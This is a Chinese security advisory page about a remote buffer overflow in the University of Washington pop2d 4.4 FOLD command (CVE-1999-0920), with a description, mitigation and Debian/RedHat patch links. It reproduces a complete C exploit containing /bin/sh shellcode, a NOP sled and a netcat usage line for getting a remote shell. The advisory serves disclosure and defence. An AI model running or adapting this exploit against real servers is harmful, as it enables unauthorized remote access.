首页 -> 安全研究
安全研究
安全漏洞
UW pop2d FOLD命令远程缓冲区溢出漏洞
发布日期:1999-05-26
更新日期:1999-05-26
受影响系统:
University of Washington imap 4.4不受影响系统:
- Debian Linux 2.1
- RedHat Linux 5.2
- RedHat Linux 5.1
- RedHat Linux 5.0
- RedHat Linux 4.2
- RedHat Linux 4.1
- RedHat Linux 4.0
University of Washington pop2d 4.4
- Debian Linux 2.1
- RedHat Linux 5.2
University of Washington pop2d 4.51描述:
University of Washington imap 4.5
- RedHat Linux 6.2 x86
University of Washington imap 4.5
- RedHat Linux 6.2 alpha
University of Washington imap 4.5
- RedHat Linux 6.2 sparc
BUGTRAQ ID: 283
CVE(CAN) ID: CVE-1999-0920
pop2d是University of Washington实现的一个开放源码的POP服务器。
pop2d 4.4及以前版本存在一个缓冲区溢出漏洞,恶意的远程攻击者可以利用该漏洞获得主机的"nobody"用户权限。
pop2和pop3服务器支持"anonymous proxy",远程用户可以用这个指令打开其它有合法账号服务器的IMAP mailbox。登陆以后,FOLD命令的一个参数会引起基于堆栈的缓冲溢出。
<*来源:Chris Evans (chris@ferret.lmh.ox.ac.uk)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=92913144323190&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* Sekure SDI (Brazilian Information Security Team)
* ipop2d remote exploit for linux (Jun, 02 1999)
*
* by c0nd0r <condor@sekure.org>
*
* (read the instructions below)
*
* Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
* falcon, vader, c_orb, marty(nordo!) and minha malinha!
* also to #uground (irc.brasnet.org) and #SDI (efnet),
* guys at el8.org, toxyn.org, pulhas.org
*
* Sincere Apologizes: duke (for the mistake we made with the wu-expl),
* your code rocks.
*
* Usage:
*
* SDI-pop2 <imap_server> <user> <pass> [offset]
*
* where imap_server = IMAP server at your box (or other place as well)
* user = any account at your box
* pass = the account's password
* offset = 0 is default -- increase if it's necessary.
*
* Example: (netcat rocks)
*
* (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
*
* ----------------------------------------------------------------
* HOWTO-exploit:
*
* In order to gain remote access as user nobody, you should set
* an IMAP server at your box (just edit the inetd.conf) or at
* any other machine which you have an account.
*
* During the anonymous_login() function, the ipop2d will set the
* uid to user nobody, so you are not going to get a rootshell.
* ----------------------------------------------------------------
*
* We do NOT take any responsability for the consequences of using
* this code -- you've been warned! don't be a script k1dd13!
*
*/
#include <stdio.h>
/*
* (shellcode)
*
* jmp 0x1f
* popl %esi
* movl %esi,0x8(%esi)
* xorl %eax,%eax
* movb %eax,0x7(%esi)
* movl %eax,0xc(%esi)
* movb $0xb,%al
* movl %esi,%ebx
* leal 0x8(%esi),%ecx
* leal 0xc(%esi),%edx
* int $0x80
* xorl %ebx,%ebx
* movl %ebx,%eax
* inc %eax
* int $0x80
* call -0x24
* .string \"/bin/sh\"
* grab your shellcode generator at www.sekure.org
*/
char c0d3[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";
main (int argc, char *argv[] ) {
char buf[2500];
int x,y=1000, offset=0;
long addr;
char host[255], user[255], pass[255];
int bsize=986;
if ( argc < 4) {
printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
printf ( "usage:
(SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n");
exit (0);
}
snprintf ( host, sizeof(host), "%s", argv[1]);
snprintf ( user, sizeof(user), "%s", argv[2]);
snprintf ( pass, sizeof(pass), "%s", argv[3]);
if ( argc > 4) offset = atoi ( argv[4]);
/* gimme the ret + offset */
addr = 0xbffff3c0 + offset;
fprintf ( stderr, "0wning data since 0x%x\n\n", addr);
/* calculation of the return address position */
bsize -= strlen ( host);
for ( x = 0; x < bsize-strlen(c0d3); x++)
buf[x] = 0x90;
for ( y = 0; y < strlen(c0d3); x++, y++)
buf[x] = c0d3[y];
for ( ; x < 1012; x+=4) {
buf[x ] = addr & 0x000000ff;
buf[x+1] = (addr & 0x0000ff00) >> 8;
buf[x+2] = (addr & 0x00ff0000) >> 16;
buf[x+3] = (addr & 0xff000000) >> 24;
}
sleep (1);
printf ( "HELO %s:%s %s\r\n", host, user, pass);
sleep (1);
printf ( "FOLD %s\r\n", buf);
}
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 暂时关闭pop2d服务
在/etc/inetd.conf中注释掉ipop2d行:
#pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d
然后重起inetd服务。
厂商补丁:
Debian
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Source archives:
http://security.debian.org/dists/stable/updates/source/imap_4.5-0slink2.diff.gz
MD5 checksum: 606f893869069eee68f4c1e31392af29
http://security.debian.org/dists/stable/updates/source/imap_4.5-0slink2.dsc
MD5 checksum: 93ed80a3619586ff9f3246003aca2448
http://security.debian.org/dists/stable/updates/source/imap_4.5.orig.tar.gz
MD5 checksum: 59afe4be5fcd17c20d241633a4a3d0ac
Sun Sparc architecture:
http://security.debian.org/dists/stable/updates/binary-sparc/c-client-dev_4.5-0slink2_sparc.deb
MD5 checksum: 2de5363a3ea9f27c1aa064c3102567cc
http://security.debian.org/dists/stable/updates/binary-sparc/imap_4.5-0slink2_sparc.deb
MD5 checksum: 87638b6ad06094f30ff6d2dddfd10b8b
http://security.debian.org/dists/stable/updates/binary-sparc/ipopd_4.5-0slink2_sparc.deb
MD5 checksum: aa6621e2f7e2df751489c397e9e169a8
Intel ia32 architecture:
http://security.debian.org/dists/stable/updates/binary-i386/c-client-dev_4.5-0slink2_i386.deb
MD5 checksum: fd92656c7281a4d8322b6da1285475cd
http://security.debian.org/dists/stable/updates/binary-i386/imap_4.5-0slink2_i386.deb
MD5 checksum: c92eaece7e431c84708909362afad07d
http://security.debian.org/dists/stable/updates/binary-i386/ipopd_4.5-0slink2_i386.deb
MD5 checksum: 29685847b0eef8307383a428b1d02be2
Motorola 680x0 architecture:
http://security.debian.org/dists/stable/updates/binary-m68k/c-client-dev_4.5-0slink2_m68k.deb
MD5 checksum: eeab449299e9f2d3fc97db69110b4432
http://security.debian.org/dists/stable/updates/binary-m68k/imap_4.5-0slink2_m68k.deb
MD5 checksum: 4bd0fbaa392b6013f6caa33b04578764
http://security.debian.org/dists/stable/updates/binary-m68k/ipopd_4.5-0slink2_m68k.deb
MD5 checksum: d43f502971afc531923903f3ac7b5b3f
Alpha architecture:
http://security.debian.org/dists/stable/updates/binary-alpha/c-client-dev_4.5-0slink2_alpha.deb
MD5 checksum: 6732ae9495ee29590ed85cc482fbda97
http://security.debian.org/dists/stable/updates/binary-alpha/imap_4.5-0slink2_alpha.deb
MD5 checksum: d0ee05b972d5d1bc1d066e2bae4d8c8b
http://security.debian.org/dists/stable/updates/binary-alpha/ipopd_4.5-0slink2_alpha.deb
MD5 checksum: 89c3931092537d0eb23fb50fa57f1bb0
RedHat
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Red Hat Linux 4.x:
------------------
On alpha:
rpm -Uvh ftp://updates.redhat.com/4.2/alpha/imap-4.5-0.4.2.alpha.rpm
On i386:
rpm -Uvh ftp://updates.redhat.com/4.2/i386/imap-4.5-0.4.2.i386.rpm
On sparc:
rpm -Uvh ftp://updates.redhat.com/4.2/sparc/imap-4.5-0.4.2.sparc.rpm
The source is available at
ftp://updates.redhat.com/4.2/SRPMS/imap-4.5-0.4.2.src.rpm
Red Hat Linux 5.x:
------------------
On alpha:
rpm -Uvh ftp://updates.redhat.com/5.2/alpha/imap-4.5-0.5.2.alpha.rpm
On i386:
rpm -Uvh ftp://updates.redhat.com/5.2/i386/imap-4.5-0.5.2.i386.rpm
On sparc:
rpm -Uvh ftp://updates.redhat.com/5.2/sparc/imap-4.5-0.5.2.sparc.rpm
The source is available at
ftp://updates.redhat.com/5.2/SRPMS/imap-4.5-0.5.2.src.rpm
浏览次数:11335
严重程度:0(网友投票)
绿盟科技给您安全的保障